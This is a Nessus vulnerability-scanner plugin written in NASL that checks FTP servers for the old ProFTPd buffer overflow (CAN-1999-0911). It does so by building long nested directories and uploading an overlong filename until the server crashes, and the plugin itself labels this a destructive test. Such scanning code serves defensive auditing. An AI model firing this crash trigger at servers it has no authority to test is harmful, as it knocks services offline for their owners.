home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / proftpd_overflow.nasl

< prev

next >

Wrap

Text File  |  2005-01-14  |  5KB  |  178 lines

---

1. #
2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
3. # 
4. #
5. # See the Nessus Scripts License for details
6. #
7. #
8. # XXX not a duplicate with 10189 ! See http://www.linuxsecurity.com/advisories/linuxppc_advisory-251.html
9. #
10.  
11. if(description)
12. {
13.  script_id(10190);
14.  script_bugtraq_id(612);
15.  script_version ("$Revision: 1.22 $");
16.  script_cve_id("CAN-1999-0911");
17.  name["english"] = "ProFTPd buffer overflow";
18.  name["francais"] = "DΘpassement de buffer ProFTPd";
19.  
20.  script_name(english:name["english"],
21.           francais:name["francais"]);
22.          
23.  desc["english"] = "
24. It was possible to make the remote FTP server crash
25. by creating a huge directory structure and then
26. trying to upload a file to there.
27. This is usually called the 'proftpd buffer overflow'
28. even though it might affect other FTP servers.
29.  
30. It is very likely that an attacker can use this
31. flaw to execute arbitrary code on the remote 
32. server. This will give him a shell on your system,
33. which is not a good thing.
34.  
35. Solution : upgrade your FTP server.
36. Consider removing directories writable by 'anonymous'.
37.  
38. Risk factor : High";
39.          
40.          
41. desc["francais"] = "
42. Il s'est avΘrΘ possible de faire planter le serveur
43. FTP distant en y crΘant une grande structure de
44. rΘpertoires puis en tentant d'y tΘlΘcharger un fichier.
45.  
46. On appelle souvent ce problΦme le 'dΘpassement de buffer
47. proftpd' bien qu'il puisse concerner d'autres serveurs FTP.
48.  
49. Il est trΦs probable qu'un pirate puisse utiliser ce
50. problΦme pour executer du code arbitraire sur le serveur
51. distant, ce qui lui donnera un shell sur votre systΦme,
52. ce qui n'est pas une bonne chose.
53.  
54. Solution : mettez α jour votre ProFTPd en version 1.2pre4.
55. Si vous n'utilisez pas ProFTPd, alors informez votre 
56. votre vendeur de ce problΦme.
57.  
58. Facteur de risque : ElevΘ";              
59.  script_description(english:desc["english"],
60.              francais:desc["francais"]);
61.             
62.  
63.  script_summary(english:"Checks if the remote ftp can be buffer overflown",
64.          francais:"DΘtermine si le serveur ftp distant peut etre soumis α un dΘpassement de buffer");
65.  script_category(ACT_DESTRUCTIVE_ATTACK);
66.  script_family(english:"FTP");
67.  
68.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
69.            francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
70.           
71.  script_dependencie("find_service.nes", "ftp_write_dirs.nes",
72.              "wu_ftpd_overflow.nasl");
73.  script_require_ports("Services/ftp", 21);
74.  exit(0);
75. }
76.  
77. include("ftp_func.inc");
78.  
79. #
80. # The script code starts here : 
81. #
82.  
83.  
84. login = get_kb_item("ftp/login");
85. pass  = get_kb_item("ftp/password");
86.  
87. # Then, we need a writeable directory
88. wri = get_kb_item("ftp/writeable_dir");
89. if(!wri)exit(0);
90.  
91. nomkdir = get_kb_item("ftp/no_mkdir");
92. if(nomkdir)exit(0);
93.  
94.  
95. port = get_kb_item("Services/ftp");
96. if(!port)port = 21;
97. if(!get_port_state(port))exit(0);
98. soc = open_sock_tcp(port);
99. if(soc)
100. {
101.  if(ftp_log_in(socket:soc, user:login, pass:pass))
102.  {
103.   c = string("CWD ", wri, "\r\n");
104.   send(socket:soc, data:c);
105.   b = ftp_recv_line(socket:soc);
106.   cwd = string("CWD ", crap(100), "\r\n");
107.   mkd = string("MKD ", crap(100), "\r\n");
108.   num_dirs = 0;
109.   for(i=0;i<9;i=i+1)
110.   {
111.   send(socket:soc, data:mkd);
112.   b = ftp_recv_line(socket:soc);
113.   if(!ereg(pattern:"^257 .*", string:b))
114.   {
115.    i = 9;
116.   }
117.   else
118.   {
119.    num_dirs = num_dirs + 1;
120.    send(socket:soc,data:cwd);
121.    b = ftp_recv_line(socket:soc);
122.    if(!ereg(pattern:"^250 .*", string:b))
123.     {
124.      i = 9;
125.     }
126.    }
127.   }
128.   
129.   
130.   port2 = ftp_get_pasv_port(socket:soc);
131.   soc2 = open_sock_tcp(port2);
132.   if(soc2)
133.   {
134.    command = string("STOR ", crap(100), "\r\n");
135.    send(socket:soc, data:command);
136.    b = ftp_recv_line(socket:soc);
137.    send(socket:soc2, data:crap(100));
138.    close(soc2);
139.    b = ftp_recv_line(socket:soc);
140.    command = string("HELP\r\n");
141.    send(socket:soc, data:command);
142.    b = ftp_recv_line(socket:soc);
143.    if(!b){
144.     security_hole(port);
145.        exit(0);
146.     }
147.   ftp_close(socket:soc);
148.   
149.   
150.   if(!num_dirs)exit(0);
151.   
152.   soc = open_sock_tcp(port);
153.   if(!soc)exit(0);
154.   ftp_log_in(socket:soc, user:login, pass:pass);
155.   for(i=0;i<num_dirs;i=i+1)
156.   {
157.    send(socket:soc, data:string("CWD ", crap(100), "\r\n"));
158.    b = ftp_recv_line(socket:soc);
159.   }
160.   
161.   
162.   send(socket:soc, data:string("DELE ", crap(100), "\r\n"));
163.   b = ftp_recv_line(socket:soc);
164.   send(socket:soc, data:string("CWD ..\r\n"));
165.   b = ftp_recv_line(socket:soc);
166.   for(i=0;i<num_dirs; i = i+1)
167.   {
168.    send(socket:soc, data:string("RMD ", crap(100), "\r\n"));
169.    b = ftp_recv_line(socket:soc);
170.    send(socket:soc, data:string("CWD ..\r\n"));
171.    b = ftp_recv_line(socket:soc);
172.   }
173.   
174.   ftp_close(socket:soc);
175.  }
176. }
177. }
178.